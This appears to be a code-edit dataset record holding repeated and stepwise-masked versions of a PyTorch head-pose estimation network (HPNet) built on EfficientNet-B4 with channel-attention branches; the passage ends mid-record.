x_p_b = self.fc_b_1(x_p)
x_y_b = self.fc_b_2(x_y)
x_r_b = self.fc_b_3(x_r)
x_p_b = torch.unsqueeze(x_p_b, 1)
x_y_b = torch.unsqueeze(x_y_b, 1)
x_r_b = torch.unsqueeze(x_r_b, 1)
x_p_b_mp = self.max_pool_1(x_p_b)
x_y_b_mp = self.max_pool_2(x_y_b)
x_r_b_mp = self.max_pool_3(x_r_b)
x_p_pre = self.softmax(x_p_b)
x_y_pre = self.softmax(x_y_b)
x_r_pre = self.softmax(x_r_b)
x_p = torch.sum(x_p_pre * self.idx_tensor, 2)
x_y = torch.sum(x_y_pre * self.idx_tensor, 2)
x_r = torch.sum(x_r_pre * self.idx_tensor, 2)
return torch.cat([x_p, x_y, x_r], 1), torch.cat([x_p_b, x_y_b,
x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ChannelAttention(nn.Module):
<|reserved_special_token_0|>
def forward(self, x):
avg_out = self.fc(self.avg_pool(x))
max_out = self.fc(self.max_pool(x))
out = avg_out + max_out
return self.sigmoid(out)
class SpatialAttention(nn.Module):
def __init__(self, kernel_size=7):
super(SpatialAttention, self).__init__()
self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2,
bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avg_out = torch.mean(x, dim=1, keepdim=True)
max_out, _ = torch.max(x, dim=1, keepdim=True)
x = torch.cat([avg_out, max_out], dim=1)
x = self.conv1(x)
return self.sigmoid(x)
class PYRModule(nn.Module):
def __init__(self, inplanes, downsample=None):
super(PYRModule, self).__init__()
self.ca = ChannelAttention(inplanes)
self.features = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)))
def forward(self, x):
x = self.ca(x) * x
x = self.features(x)
return x
class HPNet(nn.Module):
def __init__(self):
super(HPNet, self).__init__()
self.faceModel = efn.from_pretrained('efficientnet-b4')
self.planes_num = 1792
self.cls_num = 66
self.feature_1 = PYRModule(self.planes_num)
self.feature_2 = PYRModule(self.planes_num)
self.feature_3 = PYRModule(self.planes_num)
self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1
) * 1).cuda()
self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.max_pool_1 = nn.MaxPool1d(3)
self.max_pool_2 = nn.MaxPool1d(3)
self.max_pool_3 = nn.MaxPool1d(3)
self.softmax = nn.Softmax(dim=2).cuda()
self.sigmoid = nn.Sigmoid().cuda()
def forward(self, faces):
xFace = self.faceModel.extract_features(faces)
x_p = self.feature_1(xFace)
x_y = self.feature_2(xFace)
x_r = self.feature_3(xFace)
x_p = torch.flatten(x_p, 1)
x_y = torch.flatten(x_y, 1)
x_r = torch.flatten(x_r, 1)
x_p_feat = torch.unsqueeze(x_p, 1)
x_y_feat = torch.unsqueeze(x_y, 1)
x_r_feat = torch.unsqueeze(x_r, 1)
x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)
x_p_b = self.fc_b_1(x_p)
x_y_b = self.fc_b_2(x_y)
x_r_b = self.fc_b_3(x_r)
x_p_b = torch.unsqueeze(x_p_b, 1)
x_y_b = torch.unsqueeze(x_y_b, 1)
x_r_b = torch.unsqueeze(x_r_b, 1)
x_p_b_mp = self.max_pool_1(x_p_b)
x_y_b_mp = self.max_pool_2(x_y_b)
x_r_b_mp = self.max_pool_3(x_r_b)
x_p_pre = self.softmax(x_p_b)
x_y_pre = self.softmax(x_y_b)
x_r_pre = self.softmax(x_r_b)
x_p = torch.sum(x_p_pre * self.idx_tensor, 2)
x_y = torch.sum(x_y_pre * self.idx_tensor, 2)
x_r = torch.sum(x_r_pre * self.idx_tensor, 2)
return torch.cat([x_p, x_y, x_r], 1), torch.cat([x_p_b, x_y_b,
x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat
<|reserved_special_token_1|>
import argparse
import os
import shutil
import time, math
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
import numpy as np
import torch.utils.model_zoo as model_zoo
from torch.autograd.variable import Variable
from .Resnets import *
import torch.nn.functional as F
from torch.autograd import Variable
from efficientnet_pytorch import EfficientNet as efn
class ChannelAttention(nn.Module):
def __init__(self, in_planes, ratio=16):
super(ChannelAttention, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.max_pool = nn.AdaptiveMaxPool2d(1)
self.fc = nn.Sequential(nn.Conv2d(in_planes, in_planes // 16, 1,
bias=False), nn.ReLU(inplace=True), nn.Conv2d(in_planes // 16,
in_planes, 1, bias=False))
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avg_out = self.fc(self.avg_pool(x))
max_out = self.fc(self.max_pool(x))
out = avg_out + max_out
return self.sigmoid(out)
class SpatialAttention(nn.Module):
def __init__(self, kernel_size=7):
super(SpatialAttention, self).__init__()
self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2,
bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avg_out = torch.mean(x, dim=1, keepdim=True)
max_out, _ = torch.max(x, dim=1, keepdim=True)
x = torch.cat([avg_out, max_out], dim=1)
x = self.conv1(x)
return self.sigmoid(x)
class PYRModule(nn.Module):
def __init__(self, inplanes, downsample=None):
super(PYRModule, self).__init__()
self.ca = ChannelAttention(inplanes)
self.features = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)))
def forward(self, x):
x = self.ca(x) * x
x = self.features(x)
return x
class HPNet(nn.Module):
def __init__(self):
super(HPNet, self).__init__()
self.faceModel = efn.from_pretrained('efficientnet-b4')
self.planes_num = 1792
self.cls_num = 66
self.feature_1 = PYRModule(self.planes_num)
self.feature_2 = PYRModule(self.planes_num)
self.feature_3 = PYRModule(self.planes_num)
self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1
) * 1).cuda()
self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.max_pool_1 = nn.MaxPool1d(3)
self.max_pool_2 = nn.MaxPool1d(3)
self.max_pool_3 = nn.MaxPool1d(3)
self.softmax = nn.Softmax(dim=2).cuda()
self.sigmoid = nn.Sigmoid().cuda()
def forward(self, faces):
xFace = self.faceModel.extract_features(faces)
x_p = self.feature_1(xFace)
x_y = self.feature_2(xFace)
x_r = self.feature_3(xFace)
x_p = torch.flatten(x_p, 1)
x_y = torch.flatten(x_y, 1)
x_r = torch.flatten(x_r, 1)
x_p_feat = torch.unsqueeze(x_p, 1)
x_y_feat = torch.unsqueeze(x_y, 1)
x_r_feat = torch.unsqueeze(x_r, 1)
x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)
x_p_b = self.fc_b_1(x_p)
x_y_b = self.fc_b_2(x_y)
x_r_b = self.fc_b_3(x_r)
x_p_b = torch.unsqueeze(x_p_b, 1)
x_y_b = torch.unsqueeze(x_y_b, 1)
x_r_b = torch.unsqueeze(x_r_b, 1)
x_p_b_mp = self.max_pool_1(x_p_b)
x_y_b_mp = self.max_pool_2(x_y_b)
x_r_b_mp = self.max_pool_3(x_r_b)
x_p_pre = self.softmax(x_p_b)
x_y_pre = self.softmax(x_y_b)
x_r_pre = self.softmax(x_r_b)
x_p = torch.sum(x_p_pre * self.idx_tensor, 2)
x_y = torch.sum(x_y_pre * self.idx_tensor, 2)
x_r = torch.sum(x_r_pre * self.idx_tensor, 2)
return torch.cat([x_p, x_y, x_r], 1), torch.cat([x_p_b, x_y_b,
x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat
<|reserved_special_token_1|>
import argparse
import os
import shutil
import time, math
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
import numpy as np
import torch.utils.model_zoo as model_zoo
from torch.autograd.variable import Variable
from .Resnets import *
import torch.nn.functional as F
from torch.autograd import Variable
from efficientnet_pytorch import EfficientNet as efn
class ChannelAttention(nn.Module):
def __init__(self, in_planes, ratio=16):
super(ChannelAttention, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.max_pool = nn.AdaptiveMaxPool2d(1)
self.fc = nn.Sequential(nn.Conv2d(in_planes, in_planes // 16, 1, bias=False),
nn.ReLU(inplace=True),
nn.Conv2d(in_planes // 16, in_planes, 1, bias=False))
#self.fc = nn.Sequential(nn.Linear(in_planes, in_planes // 16, bias=False),
# nn.ReLU(inplace=True),
# nn.Linear(in_planes // 16, in_planes, bias=False))
self.sigmoid = nn.Sigmoid()
def forward(self, x):
#b, c, _, _ = x.size()
avg_out = self.fc(self.avg_pool(x))
max_out = self.fc(self.max_pool(x))
out = avg_out + max_out
return self.sigmoid(out)
class SpatialAttention(nn.Module):
def __init__(self, kernel_size=7):
super(SpatialAttention, self).__init__()
self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size//2, bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avg_out = torch.mean(x, dim=1, keepdim=True)
max_out, _ = torch.max(x, dim=1, keepdim=True)
x = torch.cat([avg_out, max_out], dim=1)
x = self.conv1(x)
return self.sigmoid(x)
class PYRModule(nn.Module):
def __init__(self,inplanes,downsample=None):
super(PYRModule, self).__init__()
self.ca = ChannelAttention(inplanes)
self.features = nn.Sequential(
nn.AdaptiveAvgPool2d((1, 1)),
)
def forward(self, x):
#residual =x
x = self.ca(x) * x
#x += residual
x = self.features(x)
return x
class HPNet(nn.Module):
    """Head-pose network: EfficientNet-B4 backbone with three branches.

    Each branch (pitch, yaw, roll) applies channel attention + global
    pooling to the shared backbone features and classifies the angle
    into ``cls_num`` bins.  ``forward`` returns a 4-tuple:

    * expected bin indices per angle, shape (batch, 3), computed as the
      softmax-weighted sum of bin indices;
    * raw per-bin logits, shape (batch, 3, cls_num);
    * max-pooled (window 3) logits, shape (batch, 3, cls_num // 3);
    * the pooled branch feature vectors, shape (batch, 3, planes_num).
    """

    def __init__(self):
        super(HPNet, self).__init__()
        self.faceModel = efn.from_pretrained('efficientnet-b4')
        # Feature width produced by the EfficientNet-B4 backbone.
        self.planes_num = 1792
        # Number of discrete classification bins per rotation axis.
        self.cls_num = 66
        # One attention + global-pooling branch per Euler angle.
        self.feature_1 = PYRModule(self.planes_num)
        self.feature_2 = PYRModule(self.planes_num)
        self.feature_3 = PYRModule(self.planes_num)
        # Bin indices 0..cls_num-1 used to turn a bin distribution into
        # an expected value.  torch.arange replaces the deprecated
        # torch.range(0, cls_num - 1) and yields identical values.
        self.idx_tensor = torch.arange(0, self.cls_num,
                                       dtype=torch.float32).cuda()
        # Per-angle bin classifiers over the pooled branch features.
        self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
        self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
        self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
        self.max_pool_1 = nn.MaxPool1d(3)
        self.max_pool_2 = nn.MaxPool1d(3)
        self.max_pool_3 = nn.MaxPool1d(3)
        self.softmax = nn.Softmax(dim=2).cuda()
        self.sigmoid = nn.Sigmoid().cuda()

    def forward(self, faces):
        """Run the network on a batch of face images.

        Returns (expected angles, raw bin logits, max-pooled logits,
        branch feature vectors) as described on the class docstring.
        """
        xFace = self.faceModel.extract_features(faces)

        # Branch-specific attention + pooling, flattened to
        # (batch, planes_num) per branch.
        x_p = torch.flatten(self.feature_1(xFace), 1)
        x_y = torch.flatten(self.feature_2(xFace), 1)
        x_r = torch.flatten(self.feature_3(xFace), 1)

        # Stack the three branch feature vectors: (batch, 3, planes_num).
        x_feat = torch.cat([torch.unsqueeze(x_p, 1),
                            torch.unsqueeze(x_y, 1),
                            torch.unsqueeze(x_r, 1)], 1)

        # Per-angle bin logits, each reshaped to (batch, 1, cls_num).
        x_p_b = torch.unsqueeze(self.fc_b_1(x_p), 1)
        x_y_b = torch.unsqueeze(self.fc_b_2(x_y), 1)
        x_r_b = torch.unsqueeze(self.fc_b_3(x_r), 1)

        # Max-pooled (window 3) logits for the auxiliary output.
        x_p_b_mp = self.max_pool_1(x_p_b)
        x_y_b_mp = self.max_pool_2(x_y_b)
        x_r_b_mp = self.max_pool_3(x_r_b)

        # Expected bin index per angle from the softmax distribution.
        x_p = torch.sum(self.softmax(x_p_b) * self.idx_tensor, 2)
        x_y = torch.sum(self.softmax(x_y_b) * self.idx_tensor, 2)
        x_r = torch.sum(self.softmax(x_r_b) * self.idx_tensor, 2)

        return (torch.cat([x_p, x_y, x_r], 1),
                torch.cat([x_p_b, x_y_b, x_r_b], 1),
                torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1),
                x_feat)
|
flexible
|
{
"blob_id": "c9de51ee5a9955f36ecd9f5d92813821fb68fb3d",
"index": 4308,
"step-1": "<mask token>\n\n\nclass SpatialAttention(nn.Module):\n\n def __init__(self, kernel_size=7):\n super(SpatialAttention, self).__init__()\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2,\n bias=False)\n self.sigmoid = nn.Sigmoid()\n <mask token>\n\n\nclass PYRModule(nn.Module):\n\n def __init__(self, inplanes, downsample=None):\n super(PYRModule, self).__init__()\n self.ca = ChannelAttention(inplanes)\n self.features = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)))\n\n def forward(self, x):\n x = self.ca(x) * x\n x = self.features(x)\n return x\n\n\nclass HPNet(nn.Module):\n\n def __init__(self):\n super(HPNet, self).__init__()\n self.faceModel = efn.from_pretrained('efficientnet-b4')\n self.planes_num = 1792\n self.cls_num = 66\n self.feature_1 = PYRModule(self.planes_num)\n self.feature_2 = PYRModule(self.planes_num)\n self.feature_3 = PYRModule(self.planes_num)\n self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1\n ) * 1).cuda()\n self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.max_pool_1 = nn.MaxPool1d(3)\n self.max_pool_2 = nn.MaxPool1d(3)\n self.max_pool_3 = nn.MaxPool1d(3)\n self.softmax = nn.Softmax(dim=2).cuda()\n self.sigmoid = nn.Sigmoid().cuda()\n\n def forward(self, faces):\n xFace = self.faceModel.extract_features(faces)\n x_p = self.feature_1(xFace)\n x_y = self.feature_2(xFace)\n x_r = self.feature_3(xFace)\n x_p = torch.flatten(x_p, 1)\n x_y = torch.flatten(x_y, 1)\n x_r = torch.flatten(x_r, 1)\n x_p_feat = torch.unsqueeze(x_p, 1)\n x_y_feat = torch.unsqueeze(x_y, 1)\n x_r_feat = torch.unsqueeze(x_r, 1)\n x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)\n x_p_b = self.fc_b_1(x_p)\n x_y_b = self.fc_b_2(x_y)\n x_r_b = self.fc_b_3(x_r)\n x_p_b = torch.unsqueeze(x_p_b, 1)\n x_y_b = torch.unsqueeze(x_y_b, 1)\n x_r_b = 
torch.unsqueeze(x_r_b, 1)\n x_p_b_mp = self.max_pool_1(x_p_b)\n x_y_b_mp = self.max_pool_2(x_y_b)\n x_r_b_mp = self.max_pool_3(x_r_b)\n x_p_pre = self.softmax(x_p_b)\n x_y_pre = self.softmax(x_y_b)\n x_r_pre = self.softmax(x_r_b)\n x_p = torch.sum(x_p_pre * self.idx_tensor, 2)\n x_y = torch.sum(x_y_pre * self.idx_tensor, 2)\n x_r = torch.sum(x_r_pre * self.idx_tensor, 2)\n return torch.cat([x_p, x_y, x_r], 1), torch.cat([x_p_b, x_y_b,\n x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat\n",
"step-2": "<mask token>\n\n\nclass ChannelAttention(nn.Module):\n <mask token>\n <mask token>\n\n\nclass SpatialAttention(nn.Module):\n\n def __init__(self, kernel_size=7):\n super(SpatialAttention, self).__init__()\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2,\n bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = torch.mean(x, dim=1, keepdim=True)\n max_out, _ = torch.max(x, dim=1, keepdim=True)\n x = torch.cat([avg_out, max_out], dim=1)\n x = self.conv1(x)\n return self.sigmoid(x)\n\n\nclass PYRModule(nn.Module):\n\n def __init__(self, inplanes, downsample=None):\n super(PYRModule, self).__init__()\n self.ca = ChannelAttention(inplanes)\n self.features = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)))\n\n def forward(self, x):\n x = self.ca(x) * x\n x = self.features(x)\n return x\n\n\nclass HPNet(nn.Module):\n\n def __init__(self):\n super(HPNet, self).__init__()\n self.faceModel = efn.from_pretrained('efficientnet-b4')\n self.planes_num = 1792\n self.cls_num = 66\n self.feature_1 = PYRModule(self.planes_num)\n self.feature_2 = PYRModule(self.planes_num)\n self.feature_3 = PYRModule(self.planes_num)\n self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1\n ) * 1).cuda()\n self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.max_pool_1 = nn.MaxPool1d(3)\n self.max_pool_2 = nn.MaxPool1d(3)\n self.max_pool_3 = nn.MaxPool1d(3)\n self.softmax = nn.Softmax(dim=2).cuda()\n self.sigmoid = nn.Sigmoid().cuda()\n\n def forward(self, faces):\n xFace = self.faceModel.extract_features(faces)\n x_p = self.feature_1(xFace)\n x_y = self.feature_2(xFace)\n x_r = self.feature_3(xFace)\n x_p = torch.flatten(x_p, 1)\n x_y = torch.flatten(x_y, 1)\n x_r = torch.flatten(x_r, 1)\n x_p_feat = torch.unsqueeze(x_p, 1)\n x_y_feat = torch.unsqueeze(x_y, 1)\n 
x_r_feat = torch.unsqueeze(x_r, 1)\n x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)\n x_p_b = self.fc_b_1(x_p)\n x_y_b = self.fc_b_2(x_y)\n x_r_b = self.fc_b_3(x_r)\n x_p_b = torch.unsqueeze(x_p_b, 1)\n x_y_b = torch.unsqueeze(x_y_b, 1)\n x_r_b = torch.unsqueeze(x_r_b, 1)\n x_p_b_mp = self.max_pool_1(x_p_b)\n x_y_b_mp = self.max_pool_2(x_y_b)\n x_r_b_mp = self.max_pool_3(x_r_b)\n x_p_pre = self.softmax(x_p_b)\n x_y_pre = self.softmax(x_y_b)\n x_r_pre = self.softmax(x_r_b)\n x_p = torch.sum(x_p_pre * self.idx_tensor, 2)\n x_y = torch.sum(x_y_pre * self.idx_tensor, 2)\n x_r = torch.sum(x_r_pre * self.idx_tensor, 2)\n return torch.cat([x_p, x_y, x_r], 1), torch.cat([x_p_b, x_y_b,\n x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat\n",
"step-3": "<mask token>\n\n\nclass ChannelAttention(nn.Module):\n <mask token>\n\n def forward(self, x):\n avg_out = self.fc(self.avg_pool(x))\n max_out = self.fc(self.max_pool(x))\n out = avg_out + max_out\n return self.sigmoid(out)\n\n\nclass SpatialAttention(nn.Module):\n\n def __init__(self, kernel_size=7):\n super(SpatialAttention, self).__init__()\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2,\n bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = torch.mean(x, dim=1, keepdim=True)\n max_out, _ = torch.max(x, dim=1, keepdim=True)\n x = torch.cat([avg_out, max_out], dim=1)\n x = self.conv1(x)\n return self.sigmoid(x)\n\n\nclass PYRModule(nn.Module):\n\n def __init__(self, inplanes, downsample=None):\n super(PYRModule, self).__init__()\n self.ca = ChannelAttention(inplanes)\n self.features = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)))\n\n def forward(self, x):\n x = self.ca(x) * x\n x = self.features(x)\n return x\n\n\nclass HPNet(nn.Module):\n\n def __init__(self):\n super(HPNet, self).__init__()\n self.faceModel = efn.from_pretrained('efficientnet-b4')\n self.planes_num = 1792\n self.cls_num = 66\n self.feature_1 = PYRModule(self.planes_num)\n self.feature_2 = PYRModule(self.planes_num)\n self.feature_3 = PYRModule(self.planes_num)\n self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1\n ) * 1).cuda()\n self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.max_pool_1 = nn.MaxPool1d(3)\n self.max_pool_2 = nn.MaxPool1d(3)\n self.max_pool_3 = nn.MaxPool1d(3)\n self.softmax = nn.Softmax(dim=2).cuda()\n self.sigmoid = nn.Sigmoid().cuda()\n\n def forward(self, faces):\n xFace = self.faceModel.extract_features(faces)\n x_p = self.feature_1(xFace)\n x_y = self.feature_2(xFace)\n x_r = self.feature_3(xFace)\n x_p = torch.flatten(x_p, 1)\n 
x_y = torch.flatten(x_y, 1)\n x_r = torch.flatten(x_r, 1)\n x_p_feat = torch.unsqueeze(x_p, 1)\n x_y_feat = torch.unsqueeze(x_y, 1)\n x_r_feat = torch.unsqueeze(x_r, 1)\n x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)\n x_p_b = self.fc_b_1(x_p)\n x_y_b = self.fc_b_2(x_y)\n x_r_b = self.fc_b_3(x_r)\n x_p_b = torch.unsqueeze(x_p_b, 1)\n x_y_b = torch.unsqueeze(x_y_b, 1)\n x_r_b = torch.unsqueeze(x_r_b, 1)\n x_p_b_mp = self.max_pool_1(x_p_b)\n x_y_b_mp = self.max_pool_2(x_y_b)\n x_r_b_mp = self.max_pool_3(x_r_b)\n x_p_pre = self.softmax(x_p_b)\n x_y_pre = self.softmax(x_y_b)\n x_r_pre = self.softmax(x_r_b)\n x_p = torch.sum(x_p_pre * self.idx_tensor, 2)\n x_y = torch.sum(x_y_pre * self.idx_tensor, 2)\n x_r = torch.sum(x_r_pre * self.idx_tensor, 2)\n return torch.cat([x_p, x_y, x_r], 1), torch.cat([x_p_b, x_y_b,\n x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat\n",
"step-4": "import argparse\nimport os\nimport shutil\nimport time, math\nfrom collections import OrderedDict\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nimport numpy as np\nimport torch.utils.model_zoo as model_zoo\nfrom torch.autograd.variable import Variable\nfrom .Resnets import *\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom efficientnet_pytorch import EfficientNet as efn\n\n\nclass ChannelAttention(nn.Module):\n\n def __init__(self, in_planes, ratio=16):\n super(ChannelAttention, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n self.fc = nn.Sequential(nn.Conv2d(in_planes, in_planes // 16, 1,\n bias=False), nn.ReLU(inplace=True), nn.Conv2d(in_planes // 16,\n in_planes, 1, bias=False))\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = self.fc(self.avg_pool(x))\n max_out = self.fc(self.max_pool(x))\n out = avg_out + max_out\n return self.sigmoid(out)\n\n\nclass SpatialAttention(nn.Module):\n\n def __init__(self, kernel_size=7):\n super(SpatialAttention, self).__init__()\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2,\n bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = torch.mean(x, dim=1, keepdim=True)\n max_out, _ = torch.max(x, dim=1, keepdim=True)\n x = torch.cat([avg_out, max_out], dim=1)\n x = self.conv1(x)\n return self.sigmoid(x)\n\n\nclass PYRModule(nn.Module):\n\n def __init__(self, inplanes, downsample=None):\n super(PYRModule, self).__init__()\n self.ca = ChannelAttention(inplanes)\n self.features = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)))\n\n def forward(self, x):\n x = self.ca(x) * x\n x = self.features(x)\n return x\n\n\nclass HPNet(nn.Module):\n\n def __init__(self):\n 
super(HPNet, self).__init__()\n self.faceModel = efn.from_pretrained('efficientnet-b4')\n self.planes_num = 1792\n self.cls_num = 66\n self.feature_1 = PYRModule(self.planes_num)\n self.feature_2 = PYRModule(self.planes_num)\n self.feature_3 = PYRModule(self.planes_num)\n self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1\n ) * 1).cuda()\n self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.max_pool_1 = nn.MaxPool1d(3)\n self.max_pool_2 = nn.MaxPool1d(3)\n self.max_pool_3 = nn.MaxPool1d(3)\n self.softmax = nn.Softmax(dim=2).cuda()\n self.sigmoid = nn.Sigmoid().cuda()\n\n def forward(self, faces):\n xFace = self.faceModel.extract_features(faces)\n x_p = self.feature_1(xFace)\n x_y = self.feature_2(xFace)\n x_r = self.feature_3(xFace)\n x_p = torch.flatten(x_p, 1)\n x_y = torch.flatten(x_y, 1)\n x_r = torch.flatten(x_r, 1)\n x_p_feat = torch.unsqueeze(x_p, 1)\n x_y_feat = torch.unsqueeze(x_y, 1)\n x_r_feat = torch.unsqueeze(x_r, 1)\n x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)\n x_p_b = self.fc_b_1(x_p)\n x_y_b = self.fc_b_2(x_y)\n x_r_b = self.fc_b_3(x_r)\n x_p_b = torch.unsqueeze(x_p_b, 1)\n x_y_b = torch.unsqueeze(x_y_b, 1)\n x_r_b = torch.unsqueeze(x_r_b, 1)\n x_p_b_mp = self.max_pool_1(x_p_b)\n x_y_b_mp = self.max_pool_2(x_y_b)\n x_r_b_mp = self.max_pool_3(x_r_b)\n x_p_pre = self.softmax(x_p_b)\n x_y_pre = self.softmax(x_y_b)\n x_r_pre = self.softmax(x_r_b)\n x_p = torch.sum(x_p_pre * self.idx_tensor, 2)\n x_y = torch.sum(x_y_pre * self.idx_tensor, 2)\n x_r = torch.sum(x_r_pre * self.idx_tensor, 2)\n return torch.cat([x_p, x_y, x_r], 1), torch.cat([x_p_b, x_y_b,\n x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat\n",
"step-5": "import argparse\nimport os\nimport shutil\nimport time, math\nfrom collections import OrderedDict\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nimport numpy as np\nimport torch.utils.model_zoo as model_zoo\nfrom torch.autograd.variable import Variable\nfrom .Resnets import *\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom efficientnet_pytorch import EfficientNet as efn\n\n\nclass ChannelAttention(nn.Module):\n def __init__(self, in_planes, ratio=16):\n super(ChannelAttention, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n \n self.fc = nn.Sequential(nn.Conv2d(in_planes, in_planes // 16, 1, bias=False),\n nn.ReLU(inplace=True),\n nn.Conv2d(in_planes // 16, in_planes, 1, bias=False))\n \n #self.fc = nn.Sequential(nn.Linear(in_planes, in_planes // 16, bias=False),\n # nn.ReLU(inplace=True),\n # nn.Linear(in_planes // 16, in_planes, bias=False))\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n #b, c, _, _ = x.size()\n avg_out = self.fc(self.avg_pool(x))\n max_out = self.fc(self.max_pool(x))\n out = avg_out + max_out\n return self.sigmoid(out)\n\nclass SpatialAttention(nn.Module):\n def __init__(self, kernel_size=7):\n super(SpatialAttention, self).__init__()\n\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size//2, bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = torch.mean(x, dim=1, keepdim=True)\n max_out, _ = torch.max(x, dim=1, keepdim=True)\n x = torch.cat([avg_out, max_out], dim=1)\n x = self.conv1(x)\n return self.sigmoid(x)\n\n\nclass PYRModule(nn.Module):\n\n def __init__(self,inplanes,downsample=None):\n super(PYRModule, self).__init__()\n \n self.ca = ChannelAttention(inplanes)\n \n 
